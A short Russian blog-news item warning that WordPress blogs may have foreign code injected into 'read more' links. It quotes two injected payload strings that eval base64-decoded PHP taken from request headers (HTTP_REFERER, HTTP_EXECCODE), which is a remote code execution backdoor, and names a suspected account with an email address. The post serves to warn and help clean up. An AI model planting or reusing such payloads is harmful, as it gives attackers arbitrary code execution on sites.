WP - очередная уязвимость
В блогах на Word Press может появиться посторонний код в ссылках на подкат.
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
или такой:
“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%
Взломанные блоги следует очистить от лишних ссылок, а также, возможно, стоит забанить MikeWink (E-mail: bugbeemershonyhe@gmail.com)
Новости по теме:
SeoPult проводит очередной круглый стол
На блоггера Дмитрия Давыдова подали в суд
2 фактора, влияющих на сканирование сайта роботом Google
![](/userfiles/img/user/newavatar_1.jpg)
![](/img/ico_3m.gif)
![](/img/thumb_up.gif)
![](/img/thumb_down.gif)
belavir (php MD5) - проверка целостности
TAC (Theme Authenticity Checker) - проверка темы
И в таком случае даже если вам что-то внедрили Вы об этом узнаете...
Для добавления комментария надо зарегистрироваться и авторизоваться.
Добавить комментарий можно после авторизации через Loginza.
![Yandex Yandex](https://loginza.ru/img/providers/yandex.png)
![Facebook Facebook](https://loginza.ru/img/providers/facebook.png)
![Google Accounts Google](https://loginza.ru/img/providers/google.png)
![Вконтакте Вконтакте](https://loginza.ru/img/providers/vkontakte.png)
![Mail.ru Mail.ru](https://loginza.ru/img/providers/mailru.png)
![Twitter Twitter](https://loginza.ru/img/providers/twitter.png)
![Loginza Loginza](https://loginza.ru/img/providers/loginza.png)
![MyOpenID MyOpenID](https://loginza.ru/img/providers/myopenid.png)
![OpenID OpenID](https://loginza.ru/img/providers/openid.png)